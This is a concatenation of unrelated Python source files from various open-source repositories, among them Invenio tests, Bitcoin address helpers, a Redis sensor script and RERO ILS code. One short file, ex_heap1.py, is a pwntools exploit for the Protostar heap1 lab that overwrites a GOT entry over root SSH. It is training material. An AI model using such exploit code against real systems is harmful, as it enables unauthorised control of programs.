FieldParserException, Field_parser.reparse, 'testsuite')
tmp_file.close()
clean_field_model_definitions()
def test_wrong_field_definitions(self):
"""JSONAlchemy - wrong field definitions"""
from invenio.modules.jsonalchemy.errors import FieldParserException
tmp_file_4 = tempfile.NamedTemporaryFile()
config_4 = '''
title:
creator:
marc, '245__', value
'''
tmp_file_4.write(config_4)
tmp_file_4.flush()
clean_field_model_definitions()
self.app.extensions['registry'][
'testsuite.fields'].register(tmp_file_4.name)
self.assertRaises(
FieldParserException, Field_parser.reparse, 'testsuite')
tmp_file_4.close()
clean_field_model_definitions()
def test_wrong_field_inheritance(self):
"""JSONAlchmey - not parent field definition"""
from invenio.modules.jsonalchemy.errors import FieldParserException
tmp_file_5 = tempfile.NamedTemporaryFile()
config_5 = '''
@extend
wrong_field:
""" Desc """
'''
tmp_file_5.write(config_5)
tmp_file_5.flush()
clean_field_model_definitions()
self.app.extensions['registry'][
'testsuite.fields'].register(tmp_file_5.name)
self.assertRaises(
FieldParserException, Field_parser.reparse, 'testsuite')
tmp_file_5.close()
clean_field_model_definitions()
def test_field_rules(self):
"""JsonAlchemy - field parser"""
self.assertTrue(len(Field_parser.field_definitions('testsuite')) >= 22)
# Check that all files are parsed
self.assertTrue(
'authors' in Field_parser.field_definitions('testsuite'))
self.assertTrue('title' in Field_parser.field_definitions('testsuite'))
# Check work around for [n] and [0]
self.assertTrue(
Field_parser.field_definitions('testsuite')['doi']['pid'])
# Check if derived and calulated are well parserd
self.assertTrue('dummy' in Field_parser.field_definitions('testsuite'))
self.assertEquals(
Field_parser.field_definitions('testsuite')['dummy']['pid'], 2)
self.assertEquals(Field_parser.field_definitions(
'testsuite')['dummy']['rules'].keys(), ['json', 'derived'])
self.assertTrue(
len(Field_parser.field_definitions(
'testsuite')['dummy']['producer']
),
2
)
self.assertTrue(Field_parser.field_definitions('testsuite')['_random'])
# Check override
value = {'a': 'a', 'b': 'b', 'k': 'k'} # noqa
self.assertEquals(
eval(Field_parser.field_definitions('testsuite')
['title']['rules']['marc'][1]['function']),
{'form': 'k', 'subtitle': 'b', 'title': 'a'})
# Check extras
self.assertTrue(
'json_ext' in
Field_parser.field_definitions('testsuite')['modification_date']
)
tmp = Field_parser.field_definitions('testsuite')
Field_parser.reparse('testsuite')
self.assertEquals(
len(Field_parser.field_definitions('testsuite')), len(tmp))
def test_field_hidden_decorator(self):
"""JsonAlchemy - field hidden decorator."""
# Check that all files are parsed
self.assertTrue(
'hidden_basic' in Field_parser.field_definitions('testsuite'))
# Check default hidden value
self.assertFalse(
Field_parser.field_definitions('testsuite')['_id']['hidden'])
# Check hidden field
self.assertTrue(Field_parser.field_definitions(
'testsuite')['hidden_basic']['hidden'])
def test_wrong_field_name_inside_model(self):
"""JSONAlchmey - wrong field name inside model"""
from invenio.modules.jsonalchemy.errors import ModelParserException
tmp_file_8 = tempfile.NamedTemporaryFile()
config_8 = '''
fields:
not_existing_field
'''
tmp_file_8.write(config_8)
tmp_file_8.flush()
clean_field_model_definitions()
self.app.extensions['registry'][
'testsuite.models'].register(tmp_file_8.name)
self.assertRaises(
ModelParserException, Model_parser.reparse, 'testsuite')
tmp_file_8.close()
clean_field_model_definitions()
def test_model_definitions(self):
"""JsonAlchemy - model parser"""
clean_field_model_definitions()
self.assertTrue(len(Model_parser.model_definitions('testsuite')) >= 2)
self.assertTrue(
'test_base' in Model_parser.model_definitions('testsuite'))
tmp = Model_parser.model_definitions('testsuite')
Model_parser.reparse('testsuite')
self.assertEquals(
len(Model_parser.model_definitions('testsuite')), len(tmp))
clean_field_model_definitions()
def test_resolve_several_models(self):
"""JSONAlchemy - test resolve several models"""
test_model = Model_parser.model_definitions('testsuite')['test_model']
clean_field_model_definitions()
self.assertEquals(
Model_parser.resolve_models('test_model', 'testsuite')['fields'],
test_model['fields'])
self.assertEquals(
Model_parser.resolve_models(
['test_base', 'test_model'], 'testsuite')['fields'],
test_model['fields'])
clean_field_model_definitions()
def test_field_name_model_based(self):
"""JSONAlchemy - field name model based"""
clean_field_model_definitions()
field_model_def = Field_parser.field_definition_model_based(
'title', 'test_model', 'testsuite')
field_def = Field_parser.field_definitions('testsuite')['title_title']
value = {'a': 'Awesome title', 'b': 'sub title', 'k': 'form'}
from invenio.base.utils import try_to_eval
self.assertEqual(
try_to_eval(field_model_def['rules'][
'marc'][0]['function'], value=value),
try_to_eval(field_def['rules']['marc'][0]['function'],
value=value))
clean_field_model_definitions()
def test_guess_legacy_field_names(self):
"""JsonAlchemy - check legacy field names"""
self.assertEquals(
guess_legacy_field_names(('100__a', '245'), 'marc', 'testsuite'),
{'100__a': ['_first_author.full_name'], '245': ['title']})
self.assertEquals(
guess_legacy_field_names('foo', 'bar', 'baz'), {'foo': []})
def test_get_producer_rules(self):
"""JsonAlchemy - check producer rules"""
clean_field_model_definitions()
self.assertEquals(
len(get_producer_rules('keywords', 'json_for_marc', 'testsuite')),
1
)
self.assertRaises(
KeyError,
lambda: get_producer_rules('foo', 'json_for_marc', 'testsuite'))
clean_field_model_definitions()
TEST_SUITE = make_test_suite(TestParser)
if __name__ == '__main__':
run_test_suite(TEST_SUITE)
| egabancho/invenio | invenio/modules/jsonalchemy/testsuite/test_parser.py | Python | gpl-2.0 | 10,487 |
from __future__ import unicode_literals
from django.db import models
# Create your models here.
class Urls(models.Model):
longurl = models.CharField(max_length=256)
shorturl = models.CharField(max_length=128)
| rodrigobersan/X-Serv-18.1-Practica1 | project/acorta/models.py | Python | gpl-2.0 | 219 |
# -*- coding: utf-8 -*-
__author__ = 'mkaplenko'
import httplib
import time
class MobilMoneySms(object):
def __init__(self, phone_to, message):
self.phone_to = phone_to
self.message = message
self.sync = int(time.time()*100)
class MobilMoneySmsClient(object):
connection_host = 'gate.mobilmoney.ru'
response = None
sms = None
sync = 1
def __init__(self, login, password, originator):
self.login = login
self.password = password
self.originator = originator
def register_sms(self, sms_instance):
self.sms = sms_instance
def request_body(self):
data_kwargs = {
'login': self.login,
'password': self.password,
'originator': self.originator,
'phone_to': self.sms.phone_to,
'message': self.sms.message,
'sync': unicode(self.sms.sync)
}
data = u'''
<?xml version="1.0" encoding="utf-8"?>
<request method="SendSMSFull">
<login>{login}</login>
<pwd>{password}</pwd>
<originator>{originator}</originator>
<phone_to>{phone_to}</phone_to>
<message>{message}</message>
<sync>{sync}</sync>
</request>
'''.format(**data_kwargs).encode('utf-8')
return data
def send_sms(self):
connection = httplib.HTTPConnection(self.connection_host)
connection.request('POST', '/', self.request_body())
self.response = connection.getresponse()
@property
def answer(self):
return self.response.read() if self.response else None
if __name__ == '__main__':
sms = MobilMoneySms('+79151234567', u'Привет мир! Я тестирую смс!')
client = MobilMoneySmsClient('my_login', 'my_password', 'my_originator_name')
client.register_sms(sms)
client.send_sms()
print(client.answer)
| mkaplenko/mobilmoney_sms | client.py | Python | gpl-2.0 | 1,933 |
#!/usr/bin/env python
import binascii
import hashlib
from reversecoin.bitcoin.key import CKey as Key
from reversecoin.bitcoin.base58 import encode, decode
def myhash(s):
return hashlib.sha256(hashlib.sha256(s).digest()).digest()
def myhash160(s):
h = hashlib.new('ripemd160')
h.update(hashlib.sha256(s).digest())
return h.digest()
def getnewaddress():
# Generate public and private keys
key = Key()
key.generate()
key.set_compressed(True)
private_key = key.get_privkey()
public_key = key.get_pubkey()
private_key_hex = private_key.encode('hex')
public_key_hex = public_key.encode('hex')
public_key_bytearray = bytearray.fromhex(public_key_hex)
# Perform SHA-256 and RIPEMD-160 hashing on public key
hash160_address = myhash160(public_key_bytearray)
# add version byte: 0x00 for Main Network
extended_address = '\x00' + hash160_address
# generate double SHA-256 hash of extended address
hash_address = myhash(extended_address)
# Take the first 4 bytes of the second SHA-256 hash. This is the address checksum
checksum = hash_address[:4]
# Add the 4 checksum bytes from point 7 at the end of extended RIPEMD-160 hash from point 4. This is the 25-byte binary Bitcoin Address.
binary_address = extended_address + checksum
# Convert the result from a byte string into a base58 string using Base58Check encoding.
address = encode(binary_address)
return public_key, private_key, address
def public_key_to_address(public_key):
public_key_hex = public_key.encode('hex')
public_key_bytearray = bytearray.fromhex(public_key_hex)
# Perform SHA-256 and RIPEMD-160 hashing on public key
hash160_address = myhash160(public_key_bytearray)
# add version byte: 0x00 for Main Network
extended_address = '\x00' + hash160_address
# generate double SHA-256 hash of extended address
hash_address = myhash(extended_address)
# Take the first 4 bytes of the second SHA-256 hash. This is the address checksum
checksum = hash_address[:4]
# Add the 4 checksum bytes from point 7 at the end of extended RIPEMD-160 hash from point 4. This is the 25-byte binary Bitcoin Address.
binary_address = extended_address + checksum
address = encode(binary_address)
return address
def public_key_hex_to_address(public_key_hex):
public_key_bytearray = bytearray.fromhex(public_key_hex)
# Perform SHA-256 and RIPEMD-160 hashing on public key
hash160_address = myhash160(public_key_bytearray)
# add version byte: 0x00 for Main Network
extended_address = '\x00' + hash160_address
# generate double SHA-256 hash of extended address
hash_address = myhash(extended_address)
# Take the first 4 bytes of the second SHA-256 hash. This is the address checksum
checksum = hash_address[:4]
# Add the 4 checksum bytes from point 7 at the end of extended RIPEMD-160 hash from point 4. This is the 25-byte binary Bitcoin Address.
binary_address = extended_address + checksum
address = encode(binary_address)
return address
# fix this
def address_to_public_key_hash(address):
binary_address = decode(address)
# remove the 4 checksum bytes
extended_address = binary_address[:-4]
# remove version byte: 0x00 for Main Network
hash160_address = extended_address[1:]
return hash160_address
def public_key_hex_to_pay_to_script_hash(public_key_hex):
script = "41" + public_key_hex + "AC"
return binascii.unhexlify(script)
def address_to_pay_to_pubkey_hash(address):
print "Not implemented >>>>>>>>>>>>>>>>>>>"
exit(0)
def output_script_to_public_key_hash(script):
script_key_hash = binascii.hexlify(myhash160(bytearray.fromhex(binascii.hexlify(script[1:-1]))))
return script_key_hash
def address_to_output_script(address):
pass
if __name__ == "__main__":
address1 = "16UwLL9Risc3QfPqBUvKofHmBQ7wMtjvM"
address2 = "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa"
public_key_hex1 = "0450863AD64A87AE8A2FE83C1AF1A8403CB53F53E486D8511DAD8A04887E5B23522CD470243453A299FA9E77237716103ABC11A1DF38855ED6F2EE187E9C582BA6"
public_key_hex2 = "04678afdb0fe5548271967f1a67130b7105cd6a828e03909a67962e0ea1f61deb649f6bc3f4cef38c4f35504e51ec112de5c384df7ba0b8d578a4c702b6bf11d5f"
print "address: ", address1
print "public key_hex: ", public_key_hex1
#print "public_keys_hex: ", public_key_hex1, public_key_hex2
print "public key to address: ", public_key_hex_to_address(public_key_hex1)
print "address to public key hash: ", binascii.hexlify(address_to_public_key_hash(address1))
# print "public key hash: ", binascii.hexlify(myhash160(bytearray.fromhex(public_key_hex1)))
| obulpathi/reversecoin | reversecoin/bitcoin/utils.py | Python | gpl-2.0 | 4,697 |
"""
MUSE -- A Multi-algorithm-collaborative Universal Structure-prediction Environment
Copyright (C) 2010-2017 by Zhong-Li Liu
This program is free software; you can redistribute it and/or modify it under the
terms of the GNU General Public License as published by the Free Software Foundation
version 2 of the License.
This program is distributed in the hope that it will be useful, but WITHOUT ANY
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A
PARTICULAR PURPOSE. See the GNU General Public License for more details.
E-mail: zl.liu@163.com
"""
import os
from muse.Readwrite import Read_Write
from muse.Symmetry import Findspg
from muse.Calculators import Submit
from muse.Readwrite.ReadInput import indict
def DirectOpt(BigDict,Old_cry,nu,ng):
with open('../log.muse','a') as logfile: print >>logfile
all_enthfile = open('../all-enthalpy-'+str(nu),'a')
if int(indict['Num_Keep'][0]) > 0:
i = 0
nn = 1
nkept = 1
spglist = []
while nkept <= int(indict['Num_Keep'][0]):
if int(indict['IfReOptKept'][0]):
with open('../log.muse','a') as logfile: print >>logfile, "Direct reopt. ..."
spgnum = Findspg.Findspg(Old_cry[i][1])
if spgnum[0] not in spglist:
spglist.append(spgnum[0])
Read_Write.write_vasp('POSCAR',Old_cry[i][1],label=indict['NameSys'][0]+": "+str(ng)+'-'+str(nn),direct=True,sort=True,vasp5=True)
nk,enth,BigDict = Submit.Submit(BigDict,nu,ng,nn,Old_cry)
nn += 1
nkept +=1
else:
spgnum = Findspg.Findspg(Old_cry[i][1])
if spgnum[0] not in spglist:
with open('../log.muse','a') as logfile: print >>logfile, "-"*23,"%d-%d"%(ng,nn),"-"*23
spglist.append(spgnum[0])
with open('../log.muse','a') as logfile:
print >>logfile, "%02d: %s, %s %10.4f kept, not reopt."%(i+1,spgnum[0],spgnum[1],Old_cry[i][0])
print >>logfile
BigDict[nu][ng][Old_cry[i][0]] = Old_cry[i][1].copy()
ifexist = os.system("grep %02d-%02d: %s"%(ng,nn,"../all-enthalpy-"+str(nu)))
if ifexist != 0:
all_enthfile.write(" %02d-%02d:%11s%9s%14.6f%14.6f%14s"%(ng,nn,spgnum[0],spgnum[1],Old_cry[i][0],Old_cry[i][1].get_volume(),'----')+'\n')
Read_Write.write_vasp('POSCAR',Old_cry[i][1],label=indict['NameSys'][0]+": "+"%02d-%02d"%(ng,nn)+' '+spgnum[0]+' '+str(spgnum[1])+' '+str(Old_cry[i][0]),direct=True,sort=True,vasp5=True)
os.system("cat POSCAR >> ../poscars-%d"%nu)
nn += 1
nkept +=1
i +=1
all_enthfile.close()
return BigDict
| zhongliliu/muse | muse/Calculators/DirectOpt.py | Python | gpl-2.0 | 2,930 |
'''
Copyright (C) 2017 Quinn D Granfor <spootdev@gmail.com>
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
version 2, as published by the Free Software Foundation.
This program is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License version 2 for more details.
You should have received a copy of the GNU General Public License
version 2 along with this program; if not, write to the Free
Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
MA 02110-1301, USA.
'''
from __future__ import absolute_import, division, print_function, unicode_literals
import json
import subprocess
import time
import pika
from common import common_global
from common import common_logging_elasticsearch
from common import common_network
# start logging
common_global.es_inst = common_logging_elasticsearch.CommonElasticsearch('main_download')
def on_message(channel, method_frame, header_frame, body):
"""
Process pika message
"""
if body is not None:
common_global.es_inst.com_elastic_index('info', {'msg body': body})
json_message = json.loads(body)
if json_message['Type'] == 'youtube':
dl_pid = subprocess.Popen(['youtube-dl', '-i', '--download-archive',
'/mediakraken/archive.txt', json_message['Data']],
shell=False)
dl_pid.wait()
if json_message['Type'] == 'image':
common_network.mk_network_fetch_from_url(json_message['URL'],
json_message['Local'])
channel.basic_ack(delivery_tag=method_frame.delivery_tag)
# fire off wait for it script to allow rabbitmq connection
wait_pid = subprocess.Popen(['/mediakraken/wait-for-it-ash.sh', '-h',
'mkrabbitmq', '-p', ' 5672'], shell=False)
wait_pid.wait()
# pika rabbitmq connection
parameters = pika.ConnectionParameters('mkrabbitmq',
credentials=pika.PlainCredentials('guest', 'guest'))
connection = pika.BlockingConnection(parameters)
# setup channels and queue
channel = connection.channel()
exchange = channel.exchange_declare(exchange="mkque_download_ex", exchange_type="direct",
durable=True)
queue = channel.queue_declare(queue='mkdownload', durable=True)
channel.queue_bind(exchange="mkque_download_ex", queue='mkdownload')
channel.basic_qos(prefetch_count=1)
while True:
time.sleep(1)
# grab message from rabbitmq if available
try: # since can get connection drops
method_frame, header_frame, body = channel.basic_get(
queue='mkdownload', no_ack=False)
on_message(channel, method_frame, header_frame, body)
except:
pass
# close the pika connection
connection.cancel()
| MediaKraken/mkarchive | main_download.py | Python | gpl-2.0 | 3,059 |
import pytest
from conftest import assert_bash_exec
@pytest.mark.bashcomp(cmd=None, ignore_env=r"^\+COMPREPLY=")
class TestUnitTilde:
def test_1(self, bash):
assert_bash_exec(bash, "_tilde >/dev/null")
def test_2(self, bash):
"""Test environment non-pollution, detected at teardown."""
assert_bash_exec(
bash, 'foo() { local aa="~"; _tilde "$aa"; }; foo; unset foo'
)
def test_3(self, bash):
"""Test for https://bugs.debian.org/766163"""
assert_bash_exec(bash, "_tilde ~-o")
def _test_part_full(self, bash, part, full):
res = (
assert_bash_exec(
bash,
'_tilde "~%s"; echo "${COMPREPLY[@]}"' % part,
want_output=True,
)
.strip()
.split()
)
assert res
assert res[0] == "~%s" % full
def test_4(self, bash, part_full_user):
"""~full should complete to ~full unmodified."""
_, full = part_full_user
self._test_part_full(bash, full, full)
def test_5(self, bash, part_full_user):
"""~part should complete to ~full."""
part, full = part_full_user
self._test_part_full(bash, part, full)
| algorythmic/bash-completion | test/t/unit/test_unit_tilde.py | Python | gpl-2.0 | 1,246 |
from pwn import *
#change the host IP to your IP
sh = ssh(host='192.168.1.104', user='root',
password='godmode', port=22)
cmd = sh.set_working_directory('/opt/protostar/bin')
e = ELF("./heap1")
puts_add = p32(e.got["puts"])
winner = pack(0x8048494)
print "puts: ", puts_add
arg1 = "A"*20
arg1 += puts_add
arg2 = winner
print sh.run(['./heap1', arg1, arg2]).recvall().strip()
| spchal/Pwn-Write-ups | protostar/ex_heap1.py | Python | gpl-2.0 | 395 |
#!/usr/bin/python
# Modified 30-Oct-2013
# tng@chegwin.org
# Retrieve:
# 1: current temperature from a TMP102 sensor
# 2: Send to redis
import sys,time
from sys import path
import datetime
from time import sleep
import re
import redis
time_to_live = 3600
###### IMPORTANT #############
###### How close to comfortable temperature is this sensor
###### determines how much weighting this sensor
###### if used at an extreme point in the house (say cellar), set to 1
###### if used centrally (living room), set to 3 or 4
multiplier = 1
#import crankers
sys.path.append("/usr/local/lib/python2.7/site-packages/Adafruit-Raspberry-Pi-Python-Code/Adafruit_I2C/")
from Adafruit_I2C import Adafruit_I2C
redthis = redis.StrictRedis(host='433host',port=6379, db=0, socket_timeout=3)
room_location="cellar"
sensor_name="temperature/"+room_location+"/sensor"
mult_name="temperature/"+room_location+"/multiplier"
#print ("Sensor name is %s" % sensor_name)
#print ("Multiplier name is %s" % mult_name)
class Tmp102:
i2c = None
# Constructor
def __init__(self, address=0x48, mode=1, debug=False):
self.i2c = Adafruit_I2C(address, debug=debug)
self.address = address
self.debug = debug
# Make sure the specified mode is in the appropriate range
if ((mode < 0) | (mode > 3)):
if (self.debug):
print "Invalid Mode: Using STANDARD by default"
self.mode = self.__BMP085_STANDARD
else:
self.mode = mode
def readRawTemp(self):
"Reads the raw (uncompensated) temperature from the sensor"
self.i2c.write8(0, 0x00) # Set temp reading mode
raw = self.i2c.readList(0,2)
val = raw[0] << 4;
val |= raw[1] >> 4;
return val
def readTemperature(self):
"Gets the compensated temperature in degrees celcius"
RawBytes = self.readRawTemp() #get the temp from readRawTemp (above)
temp = float(float(RawBytes) * 0.0625) #this is the conversion value from the data sheet.
if (self.debug):
print "DBG: Raw Temp: 0x%04X (%d)" % (RawBytes & 0xFFFF, RawBytes)
print "DBG: Calibrated temperature = %f C" % temp
return RawBytes,temp
while True:
try:
mytemp = Tmp102(address=0x48)
floattemp = mytemp.readTemperature()[1]
# print ("Float temp = %f" % floattemp)
redthis.set(sensor_name,floattemp)
redthis.set(mult_name,multiplier)
redthis.expire(sensor_name,time_to_live)
redthis.expire(mult_name,time_to_live)
except:
print ("Unable to retrieve temperature")
time.sleep(120)
| tommybobbins/velpi | utilities/redis_sensor.py | Python | gpl-2.0 | 2,563 |
# vim: set fileencoding=utf-8 :
"""
This is a example of a unittest module
"""
import unittest
class TestExample(unittest.TestCase):
"""
Test of test
"""
def test_one(self):
"""
This is a example of a unittest
"""
self.assertFalse(False)
def test_two(self):
"""
This is a example of a unittest
"""
self.assertTrue(True)
| SabatierBoris/CecileWebSite | pyramidapp/tests/testexample.py | Python | gpl-2.0 | 407 |
# -*- coding: UTF-8 -*-
'''
videoscraper scraper for Exodus forks.
Nov 9 2018 - Checked
Updated and refactored by someone.
Originally created by others.
'''
import json, urllib, urlparse
from resources.lib.modules import client
from resources.lib.modules import directstream
class source:
def __init__(self):
self.priority = 1
self.language = ['en']
self.domains = ['localhost']
self.base_link = 'http://127.0.0.1:16735'
def movie(self, imdb, title, localtitle, aliases, year):
try:
return urllib.urlencode({'imdb': imdb, 'title': title, 'year': year})
except:
return
def tvshow(self, imdb, tvdb, tvshowtitle, localtvshowtitle, aliases, year):
try:
return urllib.urlencode({'imdb': imdb, 'title': tvshowtitle, 'year': year})
except:
return
def episode(self, url, imdb, tvdb, title, premiered, season, episode):
try:
data = urlparse.parse_qs(url)
data = dict([(i, data[i][0]) if data[i] else (i, '') for i in data])
return urllib.urlencode({'imdb': imdb, 'title': title, 'year': data['year'], 'season': season, 'episode': episode})
except:
return
def sources(self, url, hostDict, hostprDict):
sources = []
try:
if not url:
return sources
data = urlparse.parse_qs(url)
data = dict([(i, data[i][0]) if data[i] else (i, '') for i in data])
url = urlparse.urljoin(self.base_link, '/sources?%s' % urllib.urlencode(data))
r = client.request(url)
if not r: raise Exception()
result = json.loads(r)
try:
gvideos = [i['url'] for i in result if i['source'] == 'GVIDEO']
for url in gvideos:
gtag = directstream.googletag(url)[0]
sources.append({'source': 'gvideo', 'quality': gtag['quality'], 'language': 'en', 'url': gtag['url'], 'direct': True, 'debridonly': False})
except:
pass
try:
oloads = [i['url'] for i in result if i['source'] == 'CDN']
for url in oloads:
sources.append({'source': 'CDN', 'quality': 'HD', 'language': 'en', 'url': url, 'direct': False, 'debridonly': False})
except:
pass
return sources
except:
return sources
def resolve(self, url):
if 'googlevideo' in url:
return directstream.googlepass(url)
return url
| RuiNascimento/krepo | script.module.lambdascrapers/lib/lambdascrapers/sources_ lambdascrapers/en/videoscraper.py | Python | gpl-2.0 | 2,631 |
import tkinter
window = tkinter.Tk()
window.mainloop()
print('Anybody home?')
| simontakite/sysadmin | pythonscripts/practicalprogramming/gui/mainloop.py | Python | gpl-2.0 | 78 |
# -*- coding: utf-8 -*-
#
# RERO ILS
# Copyright (C) 2019 RERO
# Copyright (C) 2020 UCLouvain
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, version 3 of the License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""API for manipulating organisation."""
from functools import partial
from elasticsearch.exceptions import NotFoundError
from .models import OrganisationIdentifier, OrganisationMetadata
from ..api import IlsRecord, IlsRecordsIndexer, IlsRecordsSearch
from ..fetchers import id_fetcher
from ..item_types.api import ItemTypesSearch
from ..libraries.api import LibrariesSearch, Library
from ..minters import id_minter
from ..providers import Provider
from ..utils import sorted_pids
from ..vendors.api import Vendor, VendorsSearch
# provider
OrganisationProvider = type(
'OrganisationProvider',
(Provider,),
dict(identifier=OrganisationIdentifier, pid_type='org')
)
# minter
organisation_id_minter = partial(id_minter, provider=OrganisationProvider)
# fetcher
organisation_id_fetcher = partial(id_fetcher, provider=OrganisationProvider)
class OrganisationsSearch(IlsRecordsSearch):
"""Organisation search."""
class Meta:
"""Meta class."""
index = 'organisations'
doc_types = None
fields = ('*', )
facets = {}
default_filter = None
def get_record_by_viewcode(self, viewcode, fields=None):
"""Search by viewcode."""
query = self.filter('term', code=viewcode).extra(size=1)
if fields:
query = query.source(includes=fields)
response = query.execute()
if response.hits.total.value != 1:
raise NotFoundError(
f'Organisation viewcode {viewcode}: Result not found.')
return response.hits.hits[0]._source
class Organisation(IlsRecord):
"""Organisation class."""
minter = organisation_id_minter
fetcher = organisation_id_fetcher
provider = OrganisationProvider
model_cls = OrganisationMetadata
@classmethod
def get_all(cls):
"""Get all organisations."""
return sorted([
Organisation.get_record_by_id(_id)
for _id in Organisation.get_all_ids()
], key=lambda org: org.get('name'))
@classmethod
def all_code(cls):
"""Get all code."""
return [org.get('code') for org in cls.get_all()]
@classmethod
def get_record_by_viewcode(cls, viewcode):
"""Get record by view code."""
result = OrganisationsSearch().filter(
'term',
code=viewcode
).execute()
if result['hits']['total']['value'] != 1:
raise Exception(
'Organisation (get_record_by_viewcode): Result not found.')
return result['hits']['hits'][0]['_source']
@classmethod
def get_record_by_online_harvested_source(cls, source):
"""Get record by online harvested source.
:param source: the record source
:return: Organisation record or None.
"""
results = OrganisationsSearch().filter(
'term', online_harvested_source=source).scan()
try:
return Organisation.get_record_by_pid(next(results).pid)
except StopIteration:
return None
@property
def organisation_pid(self):
"""Get organisation pid ."""
return self.pid
def online_circulation_category(self):
"""Get the default circulation category for online resources."""
results = ItemTypesSearch().filter(
'term', organisation__pid=self.pid).filter(
'term', type='online').source(['pid']).scan()
try:
return next(results).pid
except StopIteration:
return None
def get_online_locations(self):
"""Get list of online locations."""
return [library.online_location
for library in self.get_libraries() if library.online_location]
def get_libraries_pids(self):
"""Get all libraries pids related to the organisation."""
results = LibrariesSearch().source(['pid'])\
.filter('term', organisation__pid=self.pid)\
.scan()
for result in results:
yield result.pid
def get_libraries(self):
"""Get all libraries related to the organisation."""
pids = self.get_libraries_pids()
for pid in pids:
yield Library.get_record_by_pid(pid)
def get_vendor_pids(self):
"""Get all vendor pids related to the organisation."""
results = VendorsSearch().source(['pid'])\
.filter('term', organisation__pid=self.pid)\
.scan()
for result in results:
yield result.pid
def get_vendors(self):
"""Get all vendors related to the organisation."""
pids = self.get_vendor_pids()
for pid in pids:
yield Vendor.get_record_by_pid(pid)
def get_links_to_me(self, get_pids=False):
"""Record links.
:param get_pids: if True list of linked pids
if False count of linked records
"""
from ..acq_receipts.api import AcqReceiptsSearch
library_query = LibrariesSearch()\
.filter('term', organisation__pid=self.pid)
receipt_query = AcqReceiptsSearch() \
.filter('term', organisation__pid=self.pid)
links = {}
if get_pids:
libraries = sorted_pids(library_query)
receipts = sorted_pids(receipt_query)
else:
libraries = library_query.count()
receipts = receipt_query.count()
if libraries:
links['libraries'] = libraries
if receipts:
links['acq_receipts'] = receipts
return links
def reasons_not_to_delete(self):
"""Get reasons not to delete record."""
cannot_delete = {}
links = self.get_links_to_me()
if links:
cannot_delete['links'] = links
return cannot_delete
def is_test_organisation(self):
"""Check if this is a test organisation."""
if self.get('code') == 'cypress':
return True
return False
class OrganisationsIndexer(IlsRecordsIndexer):
"""Holdings indexing class."""
record_cls = Organisation
def bulk_index(self, record_id_iterator):
"""Bulk index records.
:param record_id_iterator: Iterator yielding record UUIDs.
"""
super().bulk_index(record_id_iterator, doc_type='org')
| rero/reroils-app | rero_ils/modules/organisations/api.py | Python | gpl-2.0 | 7,019 |